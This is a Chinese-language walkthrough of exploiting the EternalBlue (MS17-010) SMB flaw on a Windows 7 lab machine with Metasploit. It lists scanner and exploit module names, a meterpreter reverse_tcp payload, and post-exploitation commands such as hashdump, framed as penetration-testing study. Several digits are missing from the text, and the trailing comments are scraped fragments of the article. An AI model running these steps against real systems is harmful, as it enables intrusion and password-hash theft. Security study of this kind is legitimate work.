Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间
一、Metasploit(MSF)简介
Metasploit与200年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。
1.辅助模块(Auxiliary): 主要用于渗透信息收集,提供了多种漏洞的详细信息
2.漏洞渗透模块(exploits): 也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击
.攻击荷载模块(payload): 成功入侵计算机后运行的一段可执行的代码
4.后渗透模块(Post): 进一步收集被攻击的目标系统的各种信息
5.编码模块(encoders): 通过对payload进行各种编码来绕过一些防御系统或防御软件的检测
二、永恒之蓝简介
永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wannacry病毒,使全世界大范围内遭受了该病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。
*SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP19端口和TCP445端口。
三、渗透攻击过程
*实验环境
虚拟机VMware15
攻击机:Kali_linux2020版 IP地址:192.168.122.14
靶机: windows7 x64 IP地址:192.168.122.12
*两台虚拟机均以AT方式连接,win7以关闭防火墙,可以互相ping通
*tips:担心损伤虚拟机重新配置安装很麻烦的话记得给虚拟机拍个快照哦
IP地址展示:
win7防火墙已关闭
两台虚机机之间的ping测试
首先在kali中开启postgresql数据库(kali中默认自带)
service postgresql start //开启postgresql数据库
service postgresql status //查看postgresql数据库运行状态,Actice那一栏显示active则成功开启,如下图
此时可以按 q 键退出查看数据库状态
这里解释一下为什么要开启postgresql数据库,这是因为msf工具需要利用postgresql数据库记录渗透扫描结果和信息
然后初始化一下msfdb数据库,它提示我需要root权限,所以我这里切换了一下root权限
看到两个黄的感叹号说明初始化成功
然后开启msf,直接输入命令
或者在左上角的应用程序中到漏洞利用工具,效果是一样的
这个时候我们成功进入了msf并且看到了一些相关信息,例如我们的msf是5.0.87的版本
其中由2006个攻击模块,1096个辅助模块,4个后渗透模块,562个攻击荷载模块等等
然后我们检查一下数据库的状态,看到是已经成功连接
这里我们简单介绍一下模块信息的查看,已经了解的话可以跳过,例如你可以用show exploits命令查看exploits模块,因为模块太多,需要等待一会
我这里一共到了两千多个exploits模块信息,他们的名命格式是 操作系统/服务/名称
例如这个第0条,记录的是aix操作系统下的localf服务的ibstat_path漏洞,disclosure表示它的发布时间,rank表示它的好用级别(manual一般,excellent优秀,good良好,average平均),最后的description是描述
然后我们继续渗透
首先搜索永恒之蓝模块
auxiliary表示辅助模块,exploit表示攻击模块,我们先用辅助模块对靶机进行目标收集,看其是否存在漏洞,这里快捷选择直接用use
然后我们用opti查看参数,后面required表示是否需要设置,我们只需要设置yes的选项,但是可以看到,其中的端口(rport),进程(threads)等选项已经有默认值,我们这里只需要设置rhost(目标地址)
然后我们run,根据第一行回显信息可知,目标主机很可能存在ms17_010漏洞(永恒之蓝)
然后我们利用攻击模块对其展开攻击
可以看到,我们仍然只需要设置rhosts,然后我们run或者exploit都可以
但我们看到win时,我们就攻击成功了
这个时候我们直接进入了shell,可以看到我们已经拿下了win7系统的最高权限
我们也可以查看win7的IP地址,中文字符出现了乱码的话可能要在kali上调整一下编码方式,不过还是可以看到ipv4地址与虚拟机中的一致
至此,我们拿到了目标靶机的最高权限,后面的大家就可以自己玩了,如果还有什么疑惑,欢迎留言评论或私信
!还是那句话,大家自己搭靶机玩玩就行了,切勿用于非法用途
下面是一些补充内容
这里是附加信息,已经了解的可以跳过
1.扫描靶机,检测靶机上的漏洞,选择相应的模块,例如使用ms17_010进行攻击,use auxiliary/scanner/smb/smb_ms17_010
检查并设置相应的参数,例如set rhosts 192.168.1.1
.攻击靶机,run/exploit
4.选择payload,set payload windows/x64/meterpreter/reverse_tcp
5.攻击,run/exploit
获取hash密码:meterpreter>hashdump
查看用户权限:meterpreter>getuid
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell
参考资料
https:///qq_4145285/article/details/9704009
https:///wwl01245/article/details/89421881
感谢上述博主的优秀博文
#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格
推荐阅读
留言与评论(共有 14 条评论) |
本站网友 维纳斯皮具怎么样 | 19分钟前 发表 |
通过对payload进行各种编码来绕过一些防御系统或防御软件的检测 二 | |
本站网友 人民币对港币的汇率 | 25分钟前 发表 |
进一步收集被攻击的目标系统的各种信息 5.编码模块(encoders) | |
本站网友 市场行情 | 26分钟前 发表 |
请求/响应协议,通过SMB协议可以在计算机间共享文件 | |
本站网友 北京新浪二手房 | 17分钟前 发表 |
主要用于渗透信息收集,提供了多种漏洞的详细信息 2.漏洞渗透模块(exploits) | |
本站网友 江门商铺出租 | 12分钟前 发表 |
政府等机构,只能通过支付高额的赎金才能恢复出文件 | |
本站网友 桂林力源集团 | 13分钟前 发表 |
渗透攻击过程 *实验环境 虚拟机VMware15 攻击机:Kali_linux2020版 IP地址:192.168.122.14 靶机: windows7 x64 IP地址:192.168.122.12 *两台虚拟机均以AT方式连接,win7以关闭防火墙,可以互相ping通 *tips | |
本站网友 南京汽车站网上订票 | 14分钟前 发表 |
///wwl01245/article/details/89421881 感谢上述博主的优秀博文 | |
本站网友 淮南婚纱摄影 | 3分钟前 发表 |
也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击 .攻击荷载模块(payload) | |
本站网友 电狐手机电影转换器 | 1分钟前 发表 |
///wwl01245/article/details/89421881 感谢上述博主的优秀博文 | |
本站网友 打虎亲兄弟 | 14分钟前 发表 |
Metasploit(MSF)简介 Metasploit与200年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁 | |
本站网友 生机谷 | 9分钟前 发表 |
主要用于渗透信息收集,提供了多种漏洞的详细信息 2.漏洞渗透模块(exploits) | |
本站网友 夜郎社区 | 21分钟前 发表 |
///qq_4145285/article/details/9704009 https | |
本站网友 27gan | 10分钟前 发表 |
Metasploit主要包含以下几个模块: 1.辅助模块(Auxiliary) |